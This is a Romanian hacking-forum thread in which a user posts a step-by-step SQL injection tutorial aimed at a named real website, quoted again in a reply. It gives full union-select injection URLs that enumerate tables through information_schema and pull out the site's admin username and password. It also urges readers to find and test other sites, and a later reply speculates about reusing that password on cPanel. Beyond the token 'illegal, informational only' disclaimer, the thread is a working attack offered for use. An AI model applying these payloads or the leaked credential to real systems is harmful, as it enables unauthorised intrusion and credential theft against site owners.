Jump to content
ZeroCold

[Tutorial]Sql injection

Recommended Posts

Tutorial SQL Injection

Cred ca nu a fost postat pt ca l-am cautat si nu l-am gasit... :D

Sa incepem ;)

PASUL 1:

-gasim un site:

eu am luat

PASUL 2:

-cautam vulnerabilitatea:

intram aici:

PASUL 3:

-dupa 8 punem '

-va arata asa:

Obs: Dupa ce am pus ' dupa 8 si am dat enter vedem ca a aparut o eroare,

aceasta eroare ne spune noua ca acest site este vulnerabil.

-Eroarea care o da arata asa:

QF: select * from articole where id=8\'

PASUL 4:

-acum ca stim ca acest site este vulnerabil folosim:

order by--

pentru a afla numarul de coloane din db sql.

-vom pune asa:

-am pus numarul de coloane 100.

Obs: Eroarea a aparut din nou, acum stim ca are mai putin de 100 de coloane.

-acum in loc de 100 punem 1.

-va arata asa:

Obs: Eroarea a disparut, inseamna ca are mai mult de 1 coloana si mai putin de 100.

-acum punem 10 pentru a vedea daca sunt mai putine de 10.

Obs: Eroarea a aparut, deci sunt mai putin de 10.

-acum punem 5:

Obs: eroarea a aparut, sunt mai putin de 5

-punem 4.

Obs: EROAREA NU APARE, DECI SUNT 4 COLOANE

PASUL 5:

-dupa ce am aflat cate coloane are (are 4 coloane) folosim:

union all select

-vom scrie asa:

Obs: Vedem ca nu apare nimic, inseamna ca functia union nu functioneaza.

PASUL 5:

-schimbam id-ul din url si in loc de "articol=8" punem "articol=-1"

-va arata asa:

Obs: Pe pagina au aparut doua cifre (4-2), acelea sunt coloanele vulnerabile.

PASUL 6:

-pentru a afla versiunea punem in loc de coloanele vulnerabile (4-2):

@@version

-va arata asa:

(eu l-am ales pe 2, puteti sa-l alegeti si pe 4, important este sa fie o cifra care va apare pe pagina)

Obs:In loc de cifra 2 care ne-a aparut in pasul anterior a aparut versiunea. (versiunea este: 5.0.32-Debian_7etch8-log )

PASUL 7:

-daca versiunea este mai mare de 5 folosim "information_schema" daca este mai mica ghicim totul.

-in cazul nostru versiunea este mai mare de 5, deci flolosim "information_schema"

-acum pentru a afla numele tabelelor punem in loc de 2:

table_name

si dupa 4 punem

from information_schema.tables--

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables--

Obs: a aparut"CHARACTER_SETS", este numele unui tabel, noua ne trebuie ceva de genu admin...utilizator...user.

-acum pentru a vedea numele urmatorului tabel folosim "limit".

-dupa "from information_schema.tables--" adaugam "limit 1,1--"

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables limit 1,1--

Obs: a aparut "COLLATIONS", noi va trebui sa inlocuim 1,1 cu 2,1 ; 3,1...si tot asa pana ne zice ceva de legat de admin/user/username.

-la "limit 20,1--" am primit "USER":

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,table_name,3,4 from information_schema.tables limit 20,1--

-am aflat numele tabelului, mai trebuie si coloana.

-acum inlocuim "table_name" cu "column_name" si in "information_schema.tables" scriem "information_schema.columns"

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,column_name,3,4 from information_schema.columns limit 20,1--

PASUL 8:

-acum aflam username si pass

-ne folosim de ce ne-a dat la pasul 7 cand am primit numele tabelului "USER"

-inlocuim "information_schema.columns limit 20,1--" cu "user--", iar in loc de 2 punem username sau user.

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,username,3,4 from user--

Obs: apare eroare ..NU E BINE!

-inlocuim "username" cu "user":

-va arata asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,user,3,4 from user--

Obs: in loc de cifra 4 scrie "Admin"..acesta este username-ul.

-acum ca am aflat username trebuie sa aflam parola...

-inlocuim "user" cu "password".

-vom avea asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,password,3,4 from user--

Obs: Apare eroare, iar nu e bine.

-inlcuim "password" cu "pass", vom avea asa:

http://www.magiacopilariei.ro/articole.php?articol=-1 union all select 1,pass,3,4 from user--

Obs: A aparun "sunshine". Aceasta este parola.

PASUL 9:

-Va logati cu nume si parola.

-In cazul siteului www.magiacopilariei.ro nu avem unde sa ne logam, trebuie sa folosim ftp.

-Puteti cauta alte siteuri si sa le testati.

FINISH!

ATENTIE!!! Spargerea siteurilor este ILEGALA!!!

Acest tutorial este doar informativ, nu sunt responsabil pentru pagubele provocate.

Edited by ZeroCold
  • Upvote 1
  • Downvote 1
Link to comment
Share on other sites

Tutorial SQL Injection

Cred ca nu a fost postat pt ca l-am cautat si nu l-am gasit... :D

Sa incepem ;)

PASUL 1:

-gasim un site:

eu am luat

PASUL 2:

-cautam vulnerabilitatea:

intram aici:

PASUL 3:

-dupa 8 punem '

-va arata asa:

Obs: Dupa ce am pus ' dupa 8 si am dat enter vedem ca a aparut o eroare,

aceasta eroare ne spune noua ca acest site este vulnerabil.

-Eroarea care o da arata asa:

PASUL 4:

-acum ca stim ca acest site este vulnerabil folosim:

order by--

pentru a afla numarul de coloane din db sql.

-vom pune asa:

-am pus numarul de coloane 100.

Obs: Eroarea a aparut din nou, acum stim ca are mai putin de 100 de coloane.

-acum in loc de 100 punem 1.

-va arata asa:

Obs: Eroarea a disparut, inseamna ca are mai mult de 1 coloana si mai putin de 100.

-acum punem 10 pentru a vedea daca sunt mai putine de 10.

Obs: Eroarea a aparut, deci sunt mai putin de 10.

-acum punem 5:

Obs: eroarea a aparut, sunt mai putin de 5

-punem 4.

Obs: EROAREA NU APARE, DECI SUNT 4 COLOANE

PASUL 5:

-dupa ce am aflat cate coloane are (are 4 coloane) folosim:

union all select

-vom scrie asa:

Obs: Vedem ca nu apare nimic, inseamna ca functia union nu functioneaza.

PASUL 5:

-schimbam id-ul din url si in loc de "articol=8" punem "articol=-1"

-va arata asa:

Obs: Pe pagina au aparut doua cifre (4-2), acelea sunt coloanele vulnerabile.

PASUL 6:

-pentru a afla versiunea punem in loc de coloanele vulnerabile (4-2):

@@version

-va arata asa:

(eu l-am ales pe 2, puteti sa-l alegeti si pe 4, important este sa fie o cifra care va apare pe pagina)

Obs:In loc de cifra 2 care ne-a aparut in pasul anterior a aparut versiunea. (versiunea este: 5.0.32-Debian_7etch8-log )

PASUL 7:

-daca versiunea este mai mare de 5 folosim "information_schema" daca este mai mica ghicim totul.

-in cazul nostru versiunea este mai mare de 5, deci flolosim "information_schema"

-acum pentru a afla numele tabelelor punem in loc de 2:

table_name

si dupa 4 punem

from information_schema.tables--

-va arata asa:

Obs: a aparut"CHARACTER_SETS", este numele unui tabel, noua ne trebuie ceva de genu admin...utilizator...user.

-acum pentru a vedea numele urmatorului tabel folosim "limit".

-dupa "from information_schema.tables--" adaugam "limit 1,1--"

-va arata asa:

Obs: a aparut "COLLATIONS", noi va trebui sa inlocuim 1,1 cu 2,1 ; 3,1...si tot asa pana ne zice ceva de legat de admin/user/username.

-la "limit 20,1--" am primit "USER":

-am aflat numele tabelului, mai trebuie si coloana.

-acum inlocuim "table_name" cu "column_name" si in "information_schema.tables" scriem "information_schema.columns"

PASUL 8:

-acum aflam username si pass

-ne folosim de ce ne-a dat la pasul 7 cand am primit numele tabelului "USER"

-inlocuim "information_schema.columns limit 20,1--" cu "user--", iar in loc de 2 punem username sau user.

-va arata asa:

Obs: apare eroare ..NU E BINE!

-inlocuim "username" cu "user":

-va arata asa:

Obs: in loc de cifra 4 scrie "Admin"..acesta este username-ul.

-acum ca am aflat username trebuie sa aflam parola...

-inlocuim "user" cu "password".

-vom avea asa:

Obs: Apare eroare, iar nu e bine.

-inlcuim "password" cu "pass", vom avea asa:

Obs: A aparun "sunshine". Aceasta este parola.

PASUL 9:

-Va logati cu nume si parola.

-In cazul siteului www.magiacopilariei.ro nu avem unde sa ne logam, trebuie sa folosim ftp.

-Puteti cauta alte siteuri si sa le testati.

FINISH!

ATENTIE!!! Spargerea siteurilor este ILEGALA!!!

Acest tutorial este doar informativ, nu sunt responsabil pentru pagubele provocate.

e facut de tine tutorialul ?

  • Downvote 1
Link to comment
Share on other sites

YE YE YE toata lumea face tutoriale SQL injection dar nu stim baza SQL :| bun bun

Aici cam are dreptate.trebuie sa invatam mai intai despre bazede de date SQL si apoi sa sa cautam vulnerabilitati.

Ar fi fost fain daca ar daca AR LASA "UNU"DE PE HB un tutorial complet despre injectarea cu cod malitios baze de date sql,mysql,mssql.Ceva super complet cu detalii cu tot.

Link to comment
Share on other sites

@ edededi sau te lasi de meserie, sau incerci sa te abtii de la postat intrebari idioate, si te pui pe cautat pe google tutoriale deja facute ( sunt cu milioanele ) sau convingi pe unu care are timp de tine sa-ti explice pe IM. practic ce faci tu e spam.

Link to comment
Share on other sites

Multumesc begood pentru raspunsul tau plin de informatii utile.Nu pricep ce contin intrebarile mele de sunt asa idioate,pur si simplu am intrebat de o chestie care nu e prezenta in acest tutorial, de aici pana "a face spam" e cale lunga.Multumesc inca odata ca m-ati lamurit

Link to comment
Share on other sites

mi se pare firesc, la cpanel userul este de obicei numele directorului din home unde este siteul (incearca sa generezi o eroare in php sa iti raspunda cu error at line on si adresa catre fisier), unii il pun ca fiind primele 8 litere din domeniu, si pass una aleasa de cel care a deschis contul, de obicei cel putin de complexitate medie si diferita de domeniu, in cazul de fata este posibil sa fie sunshine.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...